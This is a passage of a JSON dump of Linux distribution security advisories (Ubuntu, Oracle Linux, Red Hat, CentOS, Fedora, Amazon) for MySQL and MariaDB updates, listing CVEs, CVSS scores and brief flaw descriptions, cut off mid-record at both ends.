5, "modified": "2015-10-26T00:00:00", "published": "2015-10-26T00:00:00", "id": "USN-2781-1", "href": "https://ubuntu.com/security/notices/USN-2781-1", "title": "MySQL vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:17", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0608", "CVE-2016-0600", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2016-0546", "CVE-2016-2047", "CVE-2015-4858", "CVE-2015-4802", "CVE-2016-0606", "CVE-2015-4815", "CVE-2016-0616", "CVE-2016-0609", "CVE-2015-4879", "CVE-2016-0596", "CVE-2015-4792", "CVE-2015-4819", "CVE-2016-0598", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2016-0597", "CVE-2015-4826", "CVE-2015-7744", "CVE-2016-0505"], "description": "[1:5.5.47-1]\n- Rebase to 5.5.47\n Also fixes: CVE-2015-4792 CVE-2015-4802 CVE-2015-4815 CVE-2015-4816\n CVE-2015-4819 CVE-2015-4826 CVE-2015-4830 CVE-2015-4836 CVE-2015-4858\n CVE-2015-4861 CVE-2015-4870 CVE-2015-4879 CVE-2015-4913 CVE-2015-7744\n CVE-2016-0505 CVE-2016-0546 CVE-2016-0596 CVE-2016-0597 CVE-2016-0598\n CVE-2016-0600 CVE-2016-0606 CVE-2016-0608 CVE-2016-0609 CVE-2016-0616\n CVE-2016-2047\n Resolves: #1304515\n[1:5.5.44-3]\n- MDEV-8827 Duplicate key with auto increment\n fix innodb auto-increment handling three bugs:\n 1. innobase_next_autoinc treated the case of current\n 2. ha_innobase::get_auto_increment didn't recalculate current when increment changed\n 3. ha_innobase::get_auto_increment didn't pass offset down to innobase_next_autoinc\n Resolves: #1300621", "edition": 4, "modified": "2016-03-31T00:00:00", "published": "2016-03-31T00:00:00", "id": "ELSA-2016-0534", "href": "http://linux.oracle.com/errata/ELSA-2016-0534.html", "title": "mariadb security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2016-09-04T11:17:46", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0608", "CVE-2016-0600", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2016-0546", "CVE-2016-2047", "CVE-2015-4858", "CVE-2015-4802", "CVE-2016-0606", "CVE-2015-4815", "CVE-2016-0616", "CVE-2016-0609", "CVE-2015-4879", "CVE-2016-0596", "CVE-2015-4792", "CVE-2015-4819", "CVE-2016-0598", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2016-0597", "CVE-2015-4826", "CVE-2016-0505"], "description": "MariaDB is a multi-user, multi-threaded SQL database server that is binary\ncompatible with MySQL.\n\nIt was found that the MariaDB client library did not properly check host\nnames against server identities noted in the X.509 certificates when\nestablishing secure connections using TLS/SSL. A man-in-the-middle attacker\ncould possibly use this flaw to impersonate a server to a client.\n(CVE-2016-2047)\n\nThis update fixes several vulnerabilities in the MariaDB database server.\nInformation about these flaws can be found on the Oracle Critical Patch\nUpdate Advisory page, listed in the References section. (CVE-2015-4792,\nCVE-2015-4802, CVE-2015-4815, CVE-2015-4816, CVE-2015-4819, CVE-2015-4826,\nCVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861, CVE-2015-4870,\nCVE-2015-4879, CVE-2015-4913, CVE-2016-0505, CVE-2016-0546, CVE-2016-0596,\nCVE-2016-0597, CVE-2016-0598, CVE-2016-0600, CVE-2016-0606, CVE-2016-0608,\nCVE-2016-0609, CVE-2016-0616)\n\nThis update also fixes the following bug:\n\n* When more than one INSERT operation was executed concurrently on a\nnon-empty InnoDB table with an AUTO_INCREMENT column defined as a primary\nkey immediately after starting MariaDB, a race condition could occur. As a\nconsequence, one of the concurrent INSERT operations failed with a\n\"Duplicate key\" error message. A patch has been applied to prevent the race\ncondition. Now, each row inserted as a result of the concurrent INSERT\noperations receives a unique primary key, and the operations no longer fail\nin this scenario. (BZ#1303946)\n\nThese updated packages upgrade MariaDB to version 5.5.47. Refer to the\nMariaDB Release Notes listed in the References section for a complete list\nof changes.\n\nAll MariaDB users should upgrade to these updated packages, which correct\nthese issues. After installing this update, the mariadb service will be\nrestarted automatically.\n", "modified": "2016-06-16T14:27:25", "published": "2016-02-03T05:00:00", "id": "RHSA-2016:22610", "href": "https://access.redhat.com/errata/RHSA-2016:22610", "type": "redhat", "title": "(RHSA-2016:22610) Moderate: mariadb security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-12-11T13:31:18", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4792", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4816", "CVE-2015-4819", "CVE-2015-4826", "CVE-2015-4830", "CVE-2015-4836", "CVE-2015-4858", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4879", "CVE-2015-4913", "CVE-2016-0505", "CVE-2016-0546", "CVE-2016-0596", "CVE-2016-0597", "CVE-2016-0598", "CVE-2016-0600", "CVE-2016-0606", "CVE-2016-0608", "CVE-2016-0609", "CVE-2016-0616", "CVE-2016-0642", "CVE-2016-0651", "CVE-2016-2047", "CVE-2016-3471"], "description": "MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL.\n\nThe following packages have been upgraded to a newer upstream version: MariaDB (5.5.47). Refer to the MariaDB Release Notes listed in the References section for a complete list of changes.\n\nSecurity Fix(es):\n\n* It was found that the MariaDB client library did not properly check host names against server identities noted in the X.509 certificates when establishing secure connections using TLS/SSL. A man-in-the-middle attacker could possibly use this flaw to impersonate a server to a client. (CVE-2016-2047)\n\n* This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2015-4792, CVE-2015-4802, CVE-2015-4815, CVE-2015-4816, CVE-2015-4819, CVE-2015-4826, CVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861, CVE-2015-4870, CVE-2015-4879, CVE-2015-4913, CVE-2016-0505, CVE-2016-0546, CVE-2016-0596, CVE-2016-0597, CVE-2016-0598, CVE-2016-0600, CVE-2016-0606, CVE-2016-0608, CVE-2016-0609, CVE-2016-0616)\n\nBug Fix(es):\n\n* When more than one INSERT operation was executed concurrently on a non-empty InnoDB table with an AUTO_INCREMENT column defined as a primary key immediately after starting MariaDB, a race condition could occur. As a consequence, one of the concurrent INSERT operations failed with a \"Duplicate key\" error message. A patch has been applied to prevent the race condition. Now, each row inserted as a result of the concurrent INSERT operations receives a unique primary key, and the operations no longer fail in this scenario. (BZ#1303946)", "modified": "2018-04-12T03:33:06", "published": "2016-03-31T18:15:24", "id": "RHSA-2016:0534", "href": "https://access.redhat.com/errata/RHSA-2016:0534", "type": "redhat", "title": "(RHSA-2016:0534) Moderate: mariadb security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:55", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4792", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4816", "CVE-2015-4819", "CVE-2015-4826", "CVE-2015-4830", "CVE-2015-4836", "CVE-2015-4858", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4879", "CVE-2015-4913", "CVE-2016-0505", "CVE-2016-0546", "CVE-2016-0596", "CVE-2016-0597", "CVE-2016-0598", "CVE-2016-0600", "CVE-2016-0606", "CVE-2016-0608", "CVE-2016-0609", "CVE-2016-0616", "CVE-2016-0640", "CVE-2016-0641", "CVE-2016-0642", "CVE-2016-0643", "CVE-2016-0644", "CVE-2016-0646", "CVE-2016-0647", "CVE-2016-0648", "CVE-2016-0649", "CVE-2016-0650", "CVE-2016-0651", "CVE-2016-0666", "CVE-2016-2047", "CVE-2016-3452", "CVE-2016-3471", "CVE-2016-5444"], "description": "MariaDB is a multi-user, multi-threaded SQL database server. For all practical purposes, MariaDB is binary-compatible with MySQL.\n\nThe following packages have been upgraded to a newer upstream version: mariadb55-mariadb (5.5.49).\n\nSecurity Fix(es):\n\n* It was found that the MariaDB client library did not properly check host names against server identities noted in the X.509 certificates when establishing secure connections using TLS/SSL. A man-in-the-middle attacker could possibly use this flaw to impersonate a server to a client. (CVE-2016-2047)\n\n* This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory pages, listed in the References section. (CVE-2015-4792, CVE-2015-4802, CVE-2015-4815, CVE-2015-4816, CVE-2015-4819, CVE-2015-4826, CVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861, CVE-2015-4870, CVE-2015-4879, CVE-2015-4913, CVE-2016-0505, CVE-2016-0546, CVE-2016-0596, CVE-2016-0597, CVE-2016-0598, CVE-2016-0600, CVE-2016-0606, CVE-2016-0608, CVE-2016-0609, CVE-2016-0616, CVE-2016-0640, CVE-2016-0641, CVE-2016-0642, CVE-2016-0643, CVE-2016-0644, CVE-2016-0646, CVE-2016-0647, CVE-2016-0648, CVE-2016-0649, CVE-2016-0650, CVE-2016-0651, CVE-2016-0666, CVE-2016-3452, CVE-2016-3471, CVE-2016-5444)", "modified": "2018-06-13T01:28:17", "published": "2016-07-25T11:45:27", "id": "RHSA-2016:1481", "href": "https://access.redhat.com/errata/RHSA-2016:1481", "type": "redhat", "title": "(RHSA-2016:1481) Moderate: mariadb55-mariadb security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:59", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4792", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4826", "CVE-2015-4830", "CVE-2015-4836", "CVE-2015-4858", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4913", "CVE-2016-0505", "CVE-2016-0546", "CVE-2016-0596", "CVE-2016-0597", "CVE-2016-0598", "CVE-2016-0600", "CVE-2016-0606", "CVE-2016-0608", "CVE-2016-0609", "CVE-2016-0616", "CVE-2016-0640", "CVE-2016-0641", "CVE-2016-0642", "CVE-2016-0643", "CVE-2016-0644", "CVE-2016-0646", "CVE-2016-0647", "CVE-2016-0648", "CVE-2016-0649", "CVE-2016-0650", "CVE-2016-0651", "CVE-2016-0666", "CVE-2016-2047", "CVE-2016-3452", "CVE-2016-3471", "CVE-2016-3477", "CVE-2016-3521", "CVE-2016-3615", "CVE-2016-5440", "CVE-2016-5444"], "description": "MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon, mysqld, and many client programs.\n\nThe following packages have been upgraded to a newer upstream version: mysql55-mysql (5.5.50).\n\nSecurity Fix(es):\n\n* This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory pages, listed in the References section. (CVE-2015-4792, CVE-2015-4802, CVE-2015-4815, CVE-2015-4826, CVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861, CVE-2015-4870, CVE-2015-4913, CVE-2016-0505, CVE-2016-0546, CVE-2016-0596, CVE-2016-0597, CVE-2016-0598, CVE-2016-0600, CVE-2016-0606, CVE-2016-0608, CVE-2016-0609, CVE-2016-0616, CVE-2016-0640, CVE-2016-0641, CVE-2016-0642, CVE-2016-0643, CVE-2016-0644, CVE-2016-0646, CVE-2016-0647, CVE-2016-0648, CVE-2016-0649, CVE-2016-0650, CVE-2016-0651, CVE-2016-0666, CVE-2016-2047, CVE-2016-3452, CVE-2016-3471, CVE-2016-3477, CVE-2016-3521, CVE-2016-3615, CVE-2016-5440, CVE-2016-5444)", "modified": "2018-06-13T01:28:23", "published": "2016-07-25T11:45:08", "id": "RHSA-2016:1480", "href": "https://access.redhat.com/errata/RHSA-2016:1480", "type": "redhat", "title": "(RHSA-2016:1480) Important: mysql55-mysql security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:31:09", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4792", "CVE-2015-4800", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4826", "CVE-2015-4830", "CVE-2015-4836", "CVE-2015-4858", "CVE-2015-4861", "CVE-2015-4862", "CVE-2015-4870", "CVE-2015-4890", "CVE-2015-4910", "CVE-2015-4913", "CVE-2016-0503", "CVE-2016-0504", "CVE-2016-0505", "CVE-2016-0546", "CVE-2016-0595", "CVE-2016-0596", "CVE-2016-0597", "CVE-2016-0598", "CVE-2016-0600", "CVE-2016-0605", "CVE-2016-0606", "CVE-2016-0607", "CVE-2016-0608", "CVE-2016-0609", "CVE-2016-0610", "CVE-2016-0611", "CVE-2016-0639", "CVE-2016-0640", "CVE-2016-0641", "CVE-2016-0642", "CVE-2016-0643", "CVE-2016-0644", "CVE-2016-0646", "CVE-2016-0647", "CVE-2016-0648", "CVE-2016-0649", "CVE-2016-0650", "CVE-2016-0655", "CVE-2016-0661", "CVE-2016-0665", "CVE-2016-0666", "CVE-2016-0668", "CVE-2016-2047", "CVE-2016-3452", "CVE-2016-3471", "CVE-2016-5444"], "description": "MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon, mysqld, and many client programs.\n\nThe following packages have been upgraded to a newer upstream version: rh-mysql56-mysql (5.6.30).\n\nSecurity Fix(es):\n\n* This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory pages, listed in the References section. (CVE-2015-4792, CVE-2015-4800, CVE-2015-4802, CVE-2015-4815, CVE-2015-4826, CVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861, CVE-2015-4862, CVE-2015-4870, CVE-2015-4890, CVE-2015-4910, CVE-2015-4913, CVE-2016-0503, CVE-2016-0504, CVE-2016-0505, CVE-2016-0546, CVE-2016-0595, CVE-2016-0596, CVE-2016-0597, CVE-2016-0598, CVE-2016-0600, CVE-2016-0605, CVE-2016-0606, CVE-2016-0607, CVE-2016-0608, CVE-2016-0609, CVE-2016-0610, CVE-2016-0611, CVE-2016-0639, CVE-2016-0640, CVE-2016-0641, CVE-2016-0642, CVE-2016-0643, CVE-2016-0644, CVE-2016-0646, CVE-2016-0647, CVE-2016-0648, CVE-2016-0649, CVE-2016-0650, CVE-2016-0655, CVE-2016-0661, CVE-2016-0665, CVE-2016-0666, CVE-2016-0668, CVE-2016-2047)", "modified": "2018-06-13T01:28:21", "published": "2016-05-02T16:15:44", "id": "RHSA-2016:0705", "href": "https://access.redhat.com/errata/RHSA-2016:0705", "type": "redhat", "title": "(RHSA-2016:0705) Critical: rh-mysql56-mysql security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:31:06", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3210", "CVE-2015-3217", "CVE-2015-4792", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4816", "CVE-2015-4819", "CVE-2015-4826", "CVE-2015-4830", "CVE-2015-4836", "CVE-2015-4858", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4879", "CVE-2015-4895", "CVE-2015-4913", "CVE-2015-5073", "CVE-2015-8381", "CVE-2015-8383", "CVE-2015-8384", "CVE-2015-8385", "CVE-2015-8386", "CVE-2015-8388", "CVE-2015-8391", "CVE-2015-8392", "CVE-2015-8395", "CVE-2016-0505", "CVE-2016-0546", "CVE-2016-0596", "CVE-2016-0597", "CVE-2016-0598", "CVE-2016-0600", "CVE-2016-0606", "CVE-2016-0608", "CVE-2016-0609", "CVE-2016-0610", "CVE-2016-0616", "CVE-2016-0640", "CVE-2016-0641", "CVE-2016-0642", "CVE-2016-0643", "CVE-2016-0644", "CVE-2016-0646", "CVE-2016-0647", "CVE-2016-0648", "CVE-2016-0649", "CVE-2016-0650", "CVE-2016-0651", "CVE-2016-0655", "CVE-2016-0666", "CVE-2016-0668", "CVE-2016-1283", "CVE-2016-2047", "CVE-2016-3191", "CVE-2016-3452", "CVE-2016-3459", "CVE-2016-3471", "CVE-2016-5444"], "description": "MariaDB is a multi-user, multi-threaded SQL database server. For all practical purposes, MariaDB is binary-compatible with MySQL. MariaDB uses PCRE, a Perl-compatible regular expression library, to implement regular expression support in SQL queries.\n\nSecurity Fix(es):\n\n* It was found that the MariaDB client library did not properly check host names against server identities noted in the X.509 certificates when establishing secure connections using TLS/SSL. A man-in-the-middle attacker could possibly use this flaw to impersonate a server to a client. (CVE-2016-2047)\n\n* This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2015-4792, CVE-2015-4802, CVE-2015-4815, CVE-2015-4816, CVE-2015-4819, CVE-2015-4826, CVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861, CVE-2015-4870, CVE-2015-4879, CVE-2015-4895, CVE-2015-4913, CVE-2016-0505, CVE-2016-0546, CVE-2016-0596, CVE-2016-0597, CVE-2016-0598, CVE-2016-0600, CVE-2016-0606, CVE-2016-0608, CVE-2016-0609, CVE-2016-0610, CVE-2016-0616, CVE-2016-0640, CVE-2016-0641, CVE-2016-0642, CVE-2016-0643, CVE-2016-0644, CVE-2016-0646, CVE-2016-0647, CVE-2016-0648, CVE-2016-0649, CVE-2016-0650, CVE-2016-0651, CVE-2016-0655, CVE-2016-0666, CVE-2016-0668)\n\n* Multiple flaws were found in the way PCRE handled malformed regular expressions. An attacker able to make MariaDB execute an SQL query with a specially crafted regular expression could use these flaws to cause it to crash or, possibly, execute arbitrary code. (CVE-2015-3210, CVE-2015-3217, CVE-2015-5073, CVE-2015-8381, CVE-2015-8383, CVE-2015-8384, CVE-2015-8385, CVE-2015-8386, CVE-2015-8388, CVE-2015-8391, CVE-2015-8392, CVE-2015-8395, CVE-2016-1283, CVE-2016-3191)", "modified": "2018-06-13T01:28:20", "published": "2016-05-26T12:10:09", "id": "RHSA-2016:1132", "href": "https://access.redhat.com/errata/RHSA-2016:1132", "type": "redhat", "title": "(RHSA-2016:1132) Important: rh-mariadb100-mariadb security update", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:26:37", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0608", "CVE-2016-0600", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2016-0546", "CVE-2016-2047", "CVE-2015-4858", "CVE-2015-4802", "CVE-2016-0606", "CVE-2015-4815", "CVE-2016-3471", "CVE-2016-0616", "CVE-2016-0609", "CVE-2015-4879", "CVE-2016-0596", "CVE-2015-4792", "CVE-2016-0642", "CVE-2015-4819", "CVE-2016-0598", "CVE-2016-0651", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2016-0597", "CVE-2015-4826", "CVE-2016-0505"], "description": "**CentOS Errata and Security Advisory** CESA-2016:0534\n\n\nMariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL.\n\nThe following packages have been upgraded to a newer upstream version: MariaDB (5.5.47). Refer to the MariaDB Release Notes listed in the References section for a complete list of changes.\n\nSecurity Fix(es):\n\n* It was found that the MariaDB client library did not properly check host names against server identities noted in the X.509 certificates when establishing secure connections using TLS/SSL. A man-in-the-middle attacker could possibly use this flaw to impersonate a server to a client. (CVE-2016-2047)\n\n* This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2015-4792, CVE-2015-4802, CVE-2015-4815, CVE-2015-4816, CVE-2015-4819, CVE-2015-4826, CVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861, CVE-2015-4870, CVE-2015-4879, CVE-2015-4913, CVE-2016-0505, CVE-2016-0546, CVE-2016-0596, CVE-2016-0597, CVE-2016-0598, CVE-2016-0600, CVE-2016-0606, CVE-2016-0608, CVE-2016-0609, CVE-2016-0616)\n\nBug Fix(es):\n\n* When more than one INSERT operation was executed concurrently on a non-empty InnoDB table with an AUTO_INCREMENT column defined as a primary key immediately after starting MariaDB, a race condition could occur. As a consequence, one of the concurrent INSERT operations failed with a \"Duplicate key\" error message. A patch has been applied to prevent the race condition. Now, each row inserted as a result of the concurrent INSERT operations receives a unique primary key, and the operations no longer fail in this scenario. (BZ#1303946)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-March/033819.html\n\n**Affected packages:**\nmariadb\nmariadb-bench\nmariadb-devel\nmariadb-embedded\nmariadb-embedded-devel\nmariadb-libs\nmariadb-server\nmariadb-test\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-0534.html", "edition": 5, "modified": "2016-03-31T20:53:35", "published": "2016-03-31T20:53:35", "id": "CESA-2016:0534", "href": "http://lists.centos.org/pipermail/centos-announce/2016-March/033819.html", "title": "mariadb security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4792", "CVE-2015-4802", "CVE-2015-4807", "CVE-2015-4815", "CVE-2015-4816", "CVE-2015-4819", "CVE-2015-4826", "CVE-2015-4830", "CVE-2015-4836", "CVE-2015-4858", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4879", "CVE-2015-4895", "CVE-2015-4913", "CVE-2015-7744", "CVE-2016-0502", "CVE-2016-0503", "CVE-2016-0504", "CVE-2016-0505", "CVE-2016-0546", "CVE-2016-0594", "CVE-2016-0595", "CVE-2016-0596", "CVE-2016-0597", "CVE-2016-0598", "CVE-2016-0599", "CVE-2016-0600", "CVE-2016-0601", "CVE-2016-0605", "CVE-2016-0606", "CVE-2016-0607", "CVE-2016-0608", "CVE-2016-0609", "CVE-2016-0610", "CVE-2016-0611", "CVE-2016-0616"], "description": "MariaDB is a community developed branch of MySQL. MariaDB is a multi-user, multi-threaded SQL database server. It is a client/server implementation consisting of a server daemon (mysqld) and many different client programs and libraries. The base package contains the standard MariaDB/MySQL client programs and generic MySQL files. ", "modified": "2016-02-21T16:34:44", "published": "2016-02-21T16:34:44", "id": "FEDORA:0994E61361B1", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: mariadb-10.0.23-1.fc23", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4792", "CVE-2015-4802", "CVE-2015-4807", "CVE-2015-4815", "CVE-2015-4816", "CVE-2015-4819", "CVE-2015-4826", "CVE-2015-4830", "CVE-2015-4836", "CVE-2015-4858", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4879", "CVE-2015-4895", "CVE-2015-4913", "CVE-2015-7744", "CVE-2016-0502", "CVE-2016-0503", "CVE-2016-0504", "CVE-2016-0505", "CVE-2016-0546", "CVE-2016-0594", "CVE-2016-0595", "CVE-2016-0596", "CVE-2016-0597", "CVE-2016-0598", "CVE-2016-0599", "CVE-2016-0600", "CVE-2016-0601", "CVE-2016-0605", "CVE-2016-0606", "CVE-2016-0607", "CVE-2016-0608", "CVE-2016-0609", "CVE-2016-0610", "CVE-2016-0611", "CVE-2016-0616"], "description": "MariaDB is a community developed branch of MySQL. MariaDB is a multi-user, multi-threaded SQL database server. It is a client/server implementation consisting of a server daemon (mysqld) and many different client programs and libraries. The base package contains the standard MariaDB/MySQL client programs and generic MySQL files. ", "modified": "2016-03-05T22:51:47", "published": "2016-03-05T22:51:47", "id": "FEDORA:2C4E6617FD66", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: mariadb-10.0.23-1.fc22", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4766", "CVE-2015-4791", "CVE-2015-4792", "CVE-2015-4800", "CVE-2015-4802", "CVE-2015-4807", "CVE-2015-4815", "CVE-2015-4819", "CVE-2015-4826", "CVE-2015-4830", "CVE-2015-4833", "CVE-2015-4836", "CVE-2015-4858", "CVE-2015-4861", "CVE-2015-4862", "CVE-2015-4864", "CVE-2015-4866", "CVE-2015-4870", "CVE-2015-4879", "CVE-2015-4890", "CVE-2015-4895", "CVE-2015-4904", "CVE-2015-4905", "CVE-2015-4910", "CVE-2015-4913", "CVE-2015-7744", "CVE-2016-0502", "CVE-2016-0503", "CVE-2016-0504", "CVE-2016-0505", "CVE-2016-0546", "CVE-2016-0594", "CVE-2016-0595", "CVE-2016-0596", "CVE-2016-0597", "CVE-2016-0598", "CVE-2016-0599", "CVE-2016-0600", "CVE-2016-0601", "CVE-2016-0605", "CVE-2016-0606", "CVE-2016-0607", "CVE-2016-0608", "CVE-2016-0609", "CVE-2016-0610", "CVE-2016-0611", "CVE-2016-0616"], "description": "MySQL is a multi-user, multi-threaded SQL database server. MySQL is a client/server implementation consisting of a server daemon (mysqld) and many different client programs and libraries. The base package contains the standard MySQL client programs and generic MySQL files. ", "modified": "2016-03-09T20:17:15", "published": "2016-03-09T20:17:15", "id": "FEDORA:B323460B0848", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: community-mysql-5.6.29-1.fc22", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4766", "CVE-2015-4791", "CVE-2015-4792", "CVE-2015-4800", "CVE-2015-4802", "CVE-2015-4807", "CVE-2015-4815", "CVE-2015-4819", "CVE-2015-4826", "CVE-2015-4830", "CVE-2015-4833", "CVE-2015-4836", "CVE-2015-4858", "CVE-2015-4861", "CVE-2015-4862", "CVE-2015-4864", "CVE-2015-4866", "CVE-2015-4870", "CVE-2015-4879", "CVE-2015-4890", "CVE-2015-4895", "CVE-2015-4904", "CVE-2015-4905", "CVE-2015-4910", "CVE-2015-4913", "CVE-2015-7744", "CVE-2016-0502", "CVE-2016-0503", "CVE-2016-0504", "CVE-2016-0505", "CVE-2016-0546", "CVE-2016-0594", "CVE-2016-0595", "CVE-2016-0596", "CVE-2016-0597", "CVE-2016-0598", "CVE-2016-0599", "CVE-2016-0600", "CVE-2016-0601", "CVE-2016-0605", "CVE-2016-0606", "CVE-2016-0607", "CVE-2016-0608", "CVE-2016-0609", "CVE-2016-0610", "CVE-2016-0611", "CVE-2016-0616"], "description": "MySQL is a multi-user, multi-threaded SQL database server. MySQL is a client/server implementation consisting of a server daemon (mysqld) and many different client programs and libraries. The base package contains the standard MySQL client programs and generic MySQL files. ", "modified": "2016-03-09T20:22:00", "published": "2016-03-09T20:22:00", "id": "FEDORA:9EA6660762B4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: community-mysql-5.6.29-1.fc23", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-11-10T12:37:08", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2016-0608", "CVE-2016-0600", "CVE-2015-4830", "CVE-2016-0611", "CVE-2016-0599", "CVE-2015-4913", "CVE-2016-0594", "CVE-2015-4864", "CVE-2016-0546", "CVE-2015-4910", "CVE-2016-0605", "CVE-2015-4858", "CVE-2015-4802", "CVE-2016-0606", "CVE-2015-4815", "CVE-2016-0616", "CVE-2015-4800", "CVE-2016-0610", "CVE-2016-0609", "CVE-2015-4791", "CVE-2015-4879", "CVE-2016-0596", "CVE-2016-0504", "CVE-2015-4792", "CVE-2015-4904", "CVE-2015-4833", "CVE-2016-0595", "CVE-2015-4819", "CVE-2016-0503", "CVE-2015-4807", "CVE-2016-0598", "CVE-2016-0502", "CVE-2016-0601", "CVE-2015-4766", "CVE-2015-4836", "CVE-2015-4861", "CVE-2016-0607", "CVE-2015-4870", "CVE-2016-0597", "CVE-2015-4826", "CVE-2015-4862", "CVE-2015-7744", "CVE-2015-4890", "CVE-2016-0505"], "description": "**Issue Overview:**\n\nwolfSSL (formerly CyaSSL) before 3.6.8 does not properly handle faults associated with the Chinese Remainder Theorem (CRT) process when allowing ephemeral key exchange without low memory optimizations on a server, which makes it easier for remote attackers to obtain private RSA keys by capturing TLS handshakes, also known as a Lenstra attack. ([CVE-2015-7744 __](<https://access.redhat.com/security/cve/CVE-2015-7744>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.24 and earlier allows remote authenticated users to affect integrity via unknown vectors related to Server : Security : Privileges. ([CVE-2015-4864 __](<https://access.redhat.com/security/cve/CVE-2015-4864>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.23 and earlier allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB. ([CVE-2015-4866 __](<https://access.redhat.com/security/cve/CVE-2015-4866>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.5.45 and earlier, and 5.6.26 and earlier, allows remote authenticated users to affect availability via unknown vectors related to Server : InnoDB. ([CVE-2015-4861 __](<https://access.redhat.com/security/cve/CVE-2015-4861>))\n\nUnspecified vulnerability in Oracle MySQL Server 5.6.26 and earlier allows remote authenticated users to affect availability via vectors related to DML. ([CVE-2015-4862 __](<https://access.redhat.com/security/cve/CVE-2015-4862>))\n\nUnspecified vulnerability in Oracle MySQL 5.5.46 and earlier allows remote 